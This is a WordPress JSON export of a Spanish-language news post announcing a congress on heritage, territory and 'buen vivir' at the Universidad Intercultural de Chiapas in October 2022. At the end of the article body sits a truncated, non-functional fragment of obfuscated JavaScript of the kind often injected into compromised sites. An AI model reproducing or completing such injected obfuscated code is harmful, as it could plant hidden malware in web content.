{"id":720,"date":"2022-03-18T04:44:02","date_gmt":"2022-03-18T04:44:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=720"},"modified":"2022-03-18T04:44:04","modified_gmt":"2022-03-18T04:44:04","slug":"en-san-cristobal-se-realizara-el-segundo-congreso-patrimonio-territorio-y-buen-vivir","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=720","title":{"rendered":"En San Crist\u00f3bal se realizar\u00e1 el Segundo Congreso &#8220;Patrimonio, Territorio y Buen Vivir&#8221;"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"460\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-4.42.58-PM-1024x460.jpeg\" alt=\"\" class=\"wp-image-721\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-4.42.58-PM-1024x460.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-4.42.58-PM-300x135.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-4.42.58-PM-768x345.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-4.42.58-PM.jpeg 1152w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La Universidad Intercultural de Chiapas (Unich) dio a conocer que del 25 al 27 de octubre de 2022, ser\u00e1 sede del 2do Congreso Internacional \u201cPatrimonio, Territorio y Buen Vivir\u201d, evento que tiene como objetivo generar intercambio y debate de alto nivel sobre la situaci\u00f3n actual del Patrimonio, Territorio y Buen Vivir como abordajes te\u00f3ricos, metodol\u00f3gicos, epist\u00e9micos y pr\u00e1cticos desde el campo de la investigaci\u00f3n, la docencia y los movimientos sociales regionales de distintos pa\u00edses.<\/p>\n\n\n\n<p>\u201cEste evento es resultado del esfuerzo de varias instituciones que est\u00e1n colaborando para abordar en cinco mesas de trabajo, distintos temas que son relacionados con este tema, y se busca que los participantes puedan debatir acad\u00e9micos y representantes de movimiento sociales, integrantes de la sociedad civil, la situaci\u00f3n que guarda el patrimonio, territorio y buen vivir, desde distintos abordajes te\u00f3ricos, metodol\u00f3gicos, epist\u00e9micos y pr\u00e1cticos, tiene que ver con la forma en que nos relacionamos hoy en d\u00eda y que no se limita solo a nuestra ciudad, sino a distintas zonas del munido\u201d, dijo en conferencia de prensa Leticia Pons Bonals.<\/p>\n\n\n\n<p>La rectora de la UNICH explic\u00f3 que es un evento magno que quieren llevar a cabo de manera presencial despu\u00e9s de varios meses de y trabajar a distancia y por medio electr\u00f3nico, \u201cnos parece que ya tendr\u00edamos condiciones para poder llevar el evento del 25 al 27 de octubre, estamos a tiempo y este es un primer anunci\u00f3\u201d.<\/p>\n\n\n\n<p>Para quienes est\u00e9n interesados indic\u00f3, pueden consultar la convocatoria en la p\u00e1gina oficial&nbsp;<a href=\"http:\/\/www.unich.edu.mx\/\" target=\"_blank\" rel=\"noreferrer noopener\">www.unich.edu.mx<\/a>&nbsp;donde se mencionan las fechas importantes y desde cuando se reciben temas aceptados y tienen un lapso de tiempo para llevar a cabo el trabajo en extenso.<\/p>\n\n\n\n<p>En este sentido, Miguel S\u00e1nchez \u00c1lvarez, Coordinador general del 2do Congreso, dijo que este evento es continuidad del 1er Congreso Internacional Patrimonio, Territorio y Buen Vivir, cuya sede fue la Ciudad Universitaria Intercultural en San Crist\u00f3bal que se celebr\u00f3 los d\u00edas 25 al 27 de agosto de 2015 y que result\u00f3 con gran \u00e9xito.<\/p>\n\n\n\n<p>\u201cEn esta ocasi\u00f3n participan diversas instituciones nacional e internacional como el Departamento de Sociolog\u00eda de la Facultad de Ciencias Sociales, UNAH, Honduras, Fundaci\u00f3n Comunidad Sustentable, Bolivia, Grupo de Trabajo Fronteras, Regionalizaci\u00f3n y Globalizaci\u00f3n del Consejo Latinoamericano de Ciencias Sociales \u2013 CLACSO, Seminario Permanente de Estudios Chicanos y de Fronteras (DEAS-INAH), Centro de Investigaciones en Estudios Superiores en Antropolog\u00eda Social (CIESAS-Sureste), Posgrado en Desarrollo Rural Regional, Universidad Aut\u00f3noma Chapingo (UACH)\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s del Grupo de Investigaci\u00f3n \u201cMemoria, Historia, Espacio y Sociedad, Centro de Estudios Superiores de M\u00e9xico y Centroam\u00e9rica (CESMECA), Universidad de Ciencias y Artes de Chiapas (UNICACH), Cuerpo Acad\u00e9mico \u201cEstudios Mesoamericanos\u201d, Facultad de Ciencias Sociales, Universidad Aut\u00f3noma de Chiapas (UNACH), Facultad de Humanidades, la Maestr\u00eda en Estudios Interculturales (MEI), la Maestr\u00eda en Econom\u00eda Social Solidaria (MESS), entre otras.<\/p>\n\n\n\n<p>Finalmente record\u00f3 que del 11 de marzo y hasta el 20 de mayo, pueden enviar su resumen quienes est\u00e9n interesados, para que del 15 julio al 30 de septiembre se puedan inscribir, y a todos los aceptados por el comit\u00e9 organizador ser\u00e1 publicado el 15 de julio, siendo hasta el 150 de septiembre la publicaci\u00f3n del programa general.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- La Universidad Intercultural de Chiapas (Unich) dio a conocer que del 25 al 27 de octubre de 2022, ser\u00e1 sede del 2do Congreso Internacional \u201cPatrimonio, Territorio y Buen Vivir\u201d, evento que tiene como objetivo generar intercambio y debate de alto nivel sobre la situaci\u00f3n actual del Patrimonio, Territorio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":721,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-720","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/720","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=720"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/720\/revisions"}],"predecessor-version":[{"id":722,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/720\/revisions\/722"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/721"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=720"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=720"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=720"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}